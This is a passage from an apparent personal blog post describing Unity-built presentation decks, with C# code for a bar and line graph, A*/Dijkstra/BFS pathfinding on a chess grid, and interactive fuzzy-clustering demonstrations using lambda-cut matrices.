    public void UpdateValue(int index, int value) {
    float yMinimumBefore, yMaximumBefore;
    CalculateYScale(out yMinimumBefore, out yMaximumBefore);

    valueList[index] = value;

    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    bool yScaleChanged = yMinimumBefore != yMinimum || yMaximumBefore != yMaximum;

    if (!yScaleChanged) {
    // Y Scale did not change, update only this value
    float xPosition = xSize + index * xSize;
    float yPosition = ((value - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(value);
    graphVisualObjectList[index].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);
    } else {
    // Y scale changed, update whole graph and y axis labels
    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    graphVisualObjectList[xIndex].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);

    xIndex++;
    }

    for (int i = 0; i < yLabelList.Count; i++) {
    float normalizedValue = i * 1f / yLabelList.Count;
    yLabelList[i].GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    }
    }
    }

    private void CalculateYScale(out float yMinimum, out float yMaximum) {
    // Identify y Min and Max values
    yMaximum = valueList[0];
    yMinimum = valueList[0];

    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    int value = valueList[i];
    if (value > yMaximum) {
    yMaximum = value;
    }
    if (value < yMinimum) {
    yMinimum = value;
    }
    }

    float yDifference = yMaximum - yMinimum;
    if (yDifference <= 0) {
    yDifference = 5f;
    }
    yMaximum = yMaximum + (yDifference * 0.2f);
    yMinimum = yMinimum - (yDifference * 0.2f);

    if (startYScaleAtZero) {
    yMinimum = 0f; // Start the graph at zero
    }
    }

    /*
    * Interface definition for showing visual for a data point
    * */
    private interface IGraphVisual {

IGraphVisualObject CreateGraphVisualObject(Vector2 graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Represents a single Visual Object in the graph
    * */
    private interface IGraphVisualObject {

void SetGraphVisualObjectInfo(Vector2 graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Displays data points as a Bar Chart
    * */
    private class BarChartVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Color barColor;
    private float barWidthMultiplier;

    public BarChartVisual(RectTransform graphContainer, Color barColor, float barWidthMultiplier) {
    this.graphContainer = graphContainer;
    this.barColor = barColor;
    this.barWidthMultiplier = barWidthMultiplier;
    }

    public void CleanUp() {
    }

public IGraphVisualObject CreateGraphVisualObject(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject barGameObject = CreateBar(graphPosition, graphPositionWidth);

    BarChartVisualObject barChartVisualObject = new BarChartVisualObject(barGameObject, barWidthMultiplier);
    barChartVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    return barChartVisualObject;
    }

private GameObject CreateBar(Vector2 graphPosition, float barWidth) {
    GameObject gameObject = new GameObject("bar", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = barColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(barWidth * barWidthMultiplier, graphPosition.y);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.pivot = new Vector2(.5f, 0f);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI barButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    public class BarChartVisualObject : IGraphVisualObject {

    private GameObject barGameObject;
    private float barWidthMultiplier;

    public BarChartVisualObject(GameObject barGameObject, float barWidthMultiplier) {
    this.barGameObject = barGameObject;
    this.barWidthMultiplier = barWidthMultiplier;
    }

public void SetGraphVisualObjectInfo(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = barGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(graphPositionWidth * barWidthMultiplier, graphPosition.y);

    Button_UI barButtonUI = barGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    barButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    barButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };
    }

    public void CleanUp() {
    Destroy(barGameObject);
    }
    }
    }

    /*
    * Displays data points as a Line Graph
    * */
    private class LineGraphVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Sprite dotSprite;
    private LineGraphVisualObject lastLineGraphVisualObject;
    private Color dotColor;
    private Color dotConnectionColor;

    public LineGraphVisual(RectTransform graphContainer, Sprite dotSprite, Color dotColor, Color dotConnectionColor) {
    this.graphContainer = graphContainer;
    this.dotSprite = dotSprite;
    this.dotColor = dotColor;
    this.dotConnectionColor = dotConnectionColor;
    lastLineGraphVisualObject = null;
    }

    public void CleanUp() {
    lastLineGraphVisualObject = null;
    }


public IGraphVisualObject CreateGraphVisualObject(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject dotGameObject = CreateDot(graphPosition);


    GameObject dotConnectionGameObject = null;
    if (lastLineGraphVisualObject != null) {
    dotConnectionGameObject = CreateDotConnection(lastLineGraphVisualObject.GetGraphPosition(), dotGameObject.GetComponent<RectTransform>().anchoredPosition);
    }

    LineGraphVisualObject lineGraphVisualObject = new LineGraphVisualObject(dotGameObject, dotConnectionGameObject, lastLineGraphVisualObject);
    lineGraphVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    lastLineGraphVisualObject = lineGraphVisualObject;

    return lineGraphVisualObject;
    }

    private GameObject CreateDot(Vector2 anchoredPosition) {
    GameObject gameObject = new GameObject("dot", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().sprite = dotSprite;
    gameObject.GetComponent<Image>().color = dotColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = anchoredPosition;
    rectTransform.sizeDelta = new Vector2(11, 11);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI dotButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    private GameObject CreateDotConnection(Vector2 dotPositionA, Vector2 dotPositionB) {
    GameObject gameObject = new GameObject("dotConnection", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = dotConnectionColor;
    gameObject.GetComponent<Image>().raycastTarget = false;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    Vector2 dir = (dotPositionB - dotPositionA).normalized;
    float distance = Vector2.Distance(dotPositionA, dotPositionB);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.sizeDelta = new Vector2(distance, 3f);
    rectTransform.anchoredPosition = dotPositionA + dir * distance * .5f;
    rectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    return gameObject;
    }


    public class LineGraphVisualObject : IGraphVisualObject {

    public event EventHandler OnChangedGraphVisualObjectInfo;

    private GameObject dotGameObject;
    private GameObject dotConnectionGameObject;
    private LineGraphVisualObject lastVisualObject;

    public LineGraphVisualObject(GameObject dotGameObject, GameObject dotConnectionGameObject, LineGraphVisualObject lastVisualObject) {
    this.dotGameObject = dotGameObject;
    this.dotConnectionGameObject = dotConnectionGameObject;
    this.lastVisualObject = lastVisualObject;

    if (lastVisualObject != null) {
    lastVisualObject.OnChangedGraphVisualObjectInfo += LastVisualObject_OnChangedGraphVisualObjectInfo;
    }
    }

    private void LastVisualObject_OnChangedGraphVisualObjectInfo(object sender, EventArgs e) {
    UpdateDotConnection();
    }

public void SetGraphVisualObjectInfo(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = graphPosition;

    UpdateDotConnection();

    Button_UI dotButtonUI = dotGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    dotButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    dotButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };

    if (OnChangedGraphVisualObjectInfo != null) OnChangedGraphVisualObjectInfo(this, EventArgs.Empty);
    }

    public void CleanUp() {
    Destroy(dotGameObject);
    Destroy(dotConnectionGameObject);
    }

    public Vector2 GetGraphPosition() {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    return rectTransform.anchoredPosition;
    }

    private void UpdateDotConnection() {
    if (dotConnectionGameObject != null) {
    RectTransform dotConnectionRectTransform = dotConnectionGameObject.GetComponent<RectTransform>();
    Vector2 dir = (lastVisualObject.GetGraphPosition() - GetGraphPosition()).normalized;
    float distance = Vector2.Distance(GetGraphPosition(), lastVisualObject.GetGraphPosition());
    dotConnectionRectTransform.sizeDelta = new Vector2(distance, 3f);
    dotConnectionRectTransform.anchoredPosition = GetGraphPosition() + dir * distance * .5f;
    dotConnectionRectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    }
    }
    }
    }
    }
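A quick sketch of how another script can drive this window through its public surface; Window_Graph.instance, valueList, and UpdateValue all exist above, while the feeder component itself is hypothetical:

using System.Collections;
using UnityEngine;

// Hypothetical driver: overwrites a random slot of the graph once a second.
public class GraphFeeder : MonoBehaviour
{
    private IEnumerator Start()
    {
        while (true)
        {
            int index = Random.Range(0, Window_Graph.instance.valueList.Count);
            Window_Graph.instance.UpdateValue(index, Random.Range(0, 100));
            yield return new WaitForSeconds(1f);
        }
    }
}

Since UpdateValue only rebuilds the whole graph when the y-scale actually changes, this kind of streaming update stays cheap.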

[screenshot: slide 6]

The A* Algorithm

I even wrote a blog post about this one at the time: [Unity-Unity 中的网格系统及 AStar 算法-Zi-Zi’s Journey](…//Unity-Unity 中的网格系统及 AStar 算法/)

[screenshots]
**Layout**

The assets and color scheme were lifted from the Chess.com homepage. This deck never actually got presented; it was just for practice.

The background color is #312E2B.

Scene Logic

I slapped together the Testing class to control all the logic; call it agile development.

• Scene switching: there is only one Scene, and each Prefab represents one PPT page. Pages turn not only with the mouse but also with the keyboard keys A and D.
• Three algorithms can be used:
  • Dijkstra
  • A*
  • BFS
• Two chess pieces represent the two movement modes, 8-direction and 4-direction, toggled with the Z key (the matching heuristics are sketched below).
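For the record, the usual grid-distance heuristics behind those two modes, assuming the common 10/14 straight/diagonal step costs:

$$h_4 = 10\,(|\Delta x| + |\Delta y|), \qquad h_8 = 14\,\min(|\Delta x|, |\Delta y|) + 10\,\bigl(\max(|\Delta x|, |\Delta y|) - \min(|\Delta x|, |\Delta y|)\bigr)$$

The 4-direction rook pays full Manhattan distance, while the 8-direction king covers the diagonal overlap first and walks the remainder straight.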

[screenshot]

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using CodeMonkey.Utils;
    using CodeMonkey;
    using UnityEngine.UI;

    public class Testing : MonoBehaviour {
[SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual; // step-by-step visualization of the search
[SerializeField] private PathfindingVisual pathfindingVisual; // renders the grid
[SerializeField] private CharacterPathfindingMovementHandler characterPathfinding; // moves the character along the path

    [SerializeField] private Sprite King;
    [SerializeField] private Sprite Rook;
    [SerializeField] private Text mode;
    private Pathfinding pathfinding;
    [SerializeField] private List<GameObject> scenes;
    [SerializeField] private Text sceneIndex;
    private int currentScene = 0;

    private void Start() {
    pathfinding = new Pathfinding(8, 8, true);
    pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
    pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
    if (Input.GetMouseButtonDown(0)) {
Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
    if (path != null) {
    for (int i=0; i<path.Count - 1; i++) {
    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i+1].x, path[i+1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
    }
    }
    characterPathfinding.SetTargetPosition(mouseWorldPosition);
    }

    if (Input.GetMouseButtonDown(1)) {
Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    if(x >= 0 && y >= 0 && x < 8 && y < 8)
    pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
    }

    if(Input.GetKeyDown(KeyCode.Z))
    {
    pathfinding._8directions = !pathfinding._8directions;
    characterPathfinding.transform.Find("Chessman").GetComponent<SpriteRenderer>().sprite = pathfinding._8directions ? King : Rook;
    }
    if(Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
    {
previousScene();
    }
    if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
    {
    nextScene();
    }
    }
    public void changeMode()
    {
    if(pathfinding.mode == 1)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "Dijkstra";
    }
    if (pathfinding.mode == 2)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "BFS";
    }
    if (pathfinding.mode == 3)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "A*";
    }
    pathfinding.mode = pathfinding.mode % 3 + 1;
    }

public void previousScene()
    {
    if (currentScene == 0)
    currentScene = scenes.Count - 1;
    else
    currentScene -= 1;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    public void nextScene()
    {
    currentScene = (currentScene + 1) % scenes.Count;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    }

The Grid System

The grid system and the pathfinding algorithms are copied from Grid System in Unity (How to make it and where to use it) - YouTube.

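The heart of that tutorial is a generic grid that converts between world positions and cell indices; a minimal sketch of the idea (the names and layout are mine, not the tutorial's exact code):

using UnityEngine;

// Minimal generic grid: one TValue per cell plus the two coordinate mappings.
public class SimpleGrid<TValue>
{
    private readonly float cellSize;
    private readonly TValue[,] cells;

    public SimpleGrid(int width, int height, float cellSize)
    {
        this.cellSize = cellSize;
        cells = new TValue[width, height];
    }

    // World position of the lower-left corner of cell (x, y).
    public Vector3 GetWorldPosition(int x, int y) => new Vector3(x, y) * cellSize;

    // Inverse mapping: which cell contains this world position?
    public void GetXY(Vector3 worldPosition, out int x, out int y)
    {
        x = Mathf.FloorToInt(worldPosition.x / cellSize);
        y = Mathf.FloorToInt(worldPosition.y / cellSize);
    }

    public bool IsInside(int x, int y) =>
        x >= 0 && y >= 0 && x < cells.GetLength(0) && y < cells.GetLength(1);

    public TValue GetValue(int x, int y) => cells[x, y];
    public void SetValue(int x, int y, TValue value) => cells[x, y] = value;
}

The pathfinding.GetGrid().GetXY(...) calls in the Testing class above are exactly this inverse mapping.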
[screenshots of slides 1-7]

Fuzzy Clustering Analysis

Lao Tian didn't feel like lecturing and had us present instead, so I went up and gave a talk for practice.

By then ChatGPT already existed, and it genuinely boosted efficiency, but the material was so complex that it still took two solid days to write, orz.

Scene Logic

The same scene-switching logic as before: only one Scene, with one Prefab representing each PPT page.

The mouse cursor was replaced with a custom one.

The scene-transition animations were built with DOTween, though my approach feels a bit unorthodox; I'll learn it properly when I get the time!

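The unorthodox part, as the Update() below shows, is that the DOLocalMove tweens are re-issued every frame while a timer counts down. A tidier pattern (a sketch, not the project's code) is to fire each tween exactly once when the transition starts:

using DG.Tweening;
using UnityEngine;

// Hypothetical one-shot transition: each slide gets a single tween,
// instead of a fresh tween per frame for two seconds.
public class SlideTransition : MonoBehaviour
{
    public void Play(Transform oldSlide, Transform newSlide, bool toLeft)
    {
        float duration = 2f;
        float exitX = toLeft ? -1000f : 1000f;
        oldSlide.DOLocalMove(new Vector3(exitX, 0f, 0f), duration);
        newSlide.DOLocalMove(Vector3.zero, duration)
            .OnComplete(() => Debug.Log("transition done")); // e.g. unlock paging here
    }
}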
    using DG.Tweening;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class SceneController : MonoBehaviour
    {
    [SerializeField] private Text indexText;
    [SerializeField] private GameObject scenes;
    private int index = 0;
    private int index_old = 1;

    private GameObject oldScene;
    private GameObject newScene;
    private float timer = 0f;
    private bool changing = false;
    private bool isLeft = false;

    public Texture2D cursorTexture;

    public void OnLeftButton()
    {
    if (changing) return;
    index--;
    if (index == 0)
    {
    index = 7;
    }
    UpdateScene();
    }
    public void OnRightButton()
    {
    if (changing) return;
    index++;
    if (index == 8)
    {
    index = 1;
    }
    UpdateScene();
    }
    private void UpdateScene()
    {
    indexText.text = index + "/7";
    for (int i = 0; i < 7; i++)
    {
    Debug.Log(scenes.transform.GetChild(i).name + "," + index.ToString());
    if (scenes.transform.GetChild(i).name == index.ToString())
    {
    newScene = scenes.transform.GetChild(i).gameObject;
    }
    else if (scenes.transform.GetChild(i).name == index_old.ToString())
    {
    oldScene = scenes.transform.GetChild(i).gameObject;
    }
    else
    {
    scenes.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    if (index_old < index)
    {
    isLeft = true;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(1000, 0, 0);
    }
    else
    {
    isLeft = false;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(-1000, 0, 0);
    }
    newScene.SetActive(true);
    index_old = index;
    timer = 2f;
    }
    // Start is called before the first frame update
    void Start()
    {
    Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    index = 1;
    indexText.text = index + "/7";
    oldScene = scenes.transform.Find("1").gameObject;
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
    if(isLeft) {
    oldScene.transform.DOLocalMove(new Vector2(-1000, 0), 2f);
    }else
    oldScene.transform.DOLocalMove(new Vector2(1000, 0), 2f);
    newScene.transform.DOLocalMove(new Vector2(0, 0), 2f);
    }
    }
    }

[screenshots of slides 1-2]

Clustering Based on a Fuzzy Equivalence Relation

A reimplementation of the algorithm plus the front-end effect: dragging the Slider changes the value of λ, which recomputes the classification.

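What the slider computes is the standard λ-cut of the relation matrix R:

$$(R_\lambda)_{ij} = \begin{cases} 1, & r_{ij} \ge \lambda \\ 0, & r_{ij} < \lambda \end{cases}$$

Because R is a fuzzy equivalence relation, elements whose rows of R_λ are identical belong to the same class, which is exactly what the duplicateRows dictionary in the code below collects.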
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene2Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.48, 0.62, 0.41, 0.47},
    {0.48, 1, 0.48, 0.41, 0.47},
    {0.62, 0.48, 1, 0.41, 0.47},
    {0.41, 0.41, 0.41, 1, 0.41},
    {0.47, 0.47, 0.47, 0.41, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnSliderValueChanged();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnSliderValueChanged()
    {
// Update the λ-cut matrix and the cell colors
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda.ToString();
    subText.text = lambda.ToString();
    for (int i = 0; i < 25; i++)
    {
    if (R[i / 5, i % 5] < lambda)
    {
    R_lambda[i / 5, i % 5] = 0;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    }
    else
    {
    R_lambda[i / 5, i % 5] = 1;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    }
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
    }
// Build the classification result string
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

[screenshot: slide 3]

Cut-Matrix Classification Based on a Fuzzy Similarity Relation

FuzzyMatrixMultiplication() was copied out of ChatGPT.

Clicking the stones changes the value of k.

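What that function computes is the fuzzy (max-min) matrix power; a single composition step is

$$(R \circ R)_{ij} = \max_{m}\, \min(r_{im},\, r_{mj}),$$

and R^k is k such compositions. A similarity relation is generally not transitive, so one keeps composing until the matrix stops changing; at that point it is a fuzzy equivalence relation and the λ-cut classification from the previous slide applies.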
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private double[,] R_k = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    private int k = 1;
    [SerializeField] private Text kText;
    [SerializeField] private GameObject Stones;
    [SerializeField] private Text supText;
    [SerializeField] private Text supText2;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnChangeK();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnChangeK()
    {
    k *= 2;
    if (k == 16) { k = 1; }
    kText.text = "k=" + k;
    supText.text = supText2.text = k.ToString();
    for (int i = 1; i < 5; i++)
    {
    if (Math.Pow(2, i - 1)<=k)
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color= Color.yellow;
    else
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color = Color.white;
    }
    OnSliderValueChanged();
    }
    public double[,] FuzzyMatrixMultiplication(double[,] matrix, int k)
    {
double[,] result = (double[,])matrix.Clone(); // start from a copy of matrix
    for (int i = 2; i <= k; i++)
    {
    double[,] temp = new double[matrix.GetLength(0), matrix.GetLength(1)];
    for (int j = 0; j < matrix.GetLength(0); j++)
    {
    for (int l = 0; l < matrix.GetLength(1); l++)
    {
    double temp2 = 0;
    for (int m = 0; m < matrix.GetLength(1); m++)
    {
    double fuzzyValue = Math.Min(result[j, m], matrix[m, l]);
    temp2 = Math.Max(fuzzyValue, temp2);
    }
    temp[j, l] = temp2;
    }
    }
result = (double[,])temp.Clone(); // carry temp into the next round
    }
    return result;
    }
public void OnSliderValueChanged()
{
// Recompute R^k for the current k, then take its λ-cut
lambda = Math.Round(slider.value, 2);
lambdaText.text = "λ=" + lambda.ToString();
subText.text = lambda.ToString();

R_k = FuzzyMatrixMultiplication(R, k);
for (int i = 0; i < 25; i++)
{
Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_k[i / 5, i % 5].ToString();
}

for (int i = 0; i < 25; i++)
{
if (R_k[i / 5, i % 5] < lambda)
{
R_lambda[i / 5, i % 5] = 0;
Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
}
else
{
R_lambda[i / 5, i % 5] = 1;
Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
}
Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
}

// Build the classification result string
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

[screenshot: slide 4]

Using the Fuzzy Similarity Relation Directly for Classification

This part doesn't reproduce the algorithm; I programmed straight toward the known result.

As before, dragging the Slider changes the value of λ.

Pressing the little pencil draws the maximal tree.

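For context, the maximal-tree method builds a maximum spanning tree over the similarity graph and then deletes every edge whose weight falls below λ; the connected components that remain are the classes. The front end here fakes exactly that outcome: each edge object encodes its weight w in its name, and UpdateUI below shows it iff

$$w \ge \max(\mu, \lambda),$$

where μ steps through the tree-drawing levels each time the pencil is clicked.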
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

public class Scene4Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Color matrixColor;
    [SerializeField] private GameObject Edges;
    private double mu = 1;
    private double lambda;
private double[,] R = new double[8, 8]{
{1, 0, 0, 0, 0.5, 0, 0.4, 0},
{0, 1, 0, 0.8, 0, 0.8, 0.2, 0.5},
{0, 0, 1, 0, 0.2, 0, 0.2, 0.2},
{0, 0.8, 0, 1, 0, 0.4, 0, 0},
{0.5, 0, 0.2, 0, 1, 0, 0.8, 0},
{0, 0.8, 0, 0.4, 0, 1, 0, 0.8},
{0.4, 0.2, 0.2, 0, 0.8, 0, 1, 0},
{0, 0.5, 0.2, 0, 0, 0.8, 0, 1}
};
    [SerializeField] private GameObject Matrix;
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 64; i++)
    {
    Matrix.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 8, i % 8].ToString();
    if(i / 8 >= i % 8)
    {
    Matrix.transform.Find((i + 1).ToString()).GetComponent<Image>().color = matrixColor;
    }
    }
    OnSliderValueChanged();
    }
    public void OnDrawButton()
    {
    if (mu == 1)
    mu = 0.8;
    else if (mu == 0.8)
    mu = 0.5;
    else if (mu == 0.5)
    mu = 0.4;
    else if (mu == 0.4)
    mu = 0.2;
    else
    mu = 1;
    UpdateUI();
    }
    public void OnSliderValueChanged()
    {
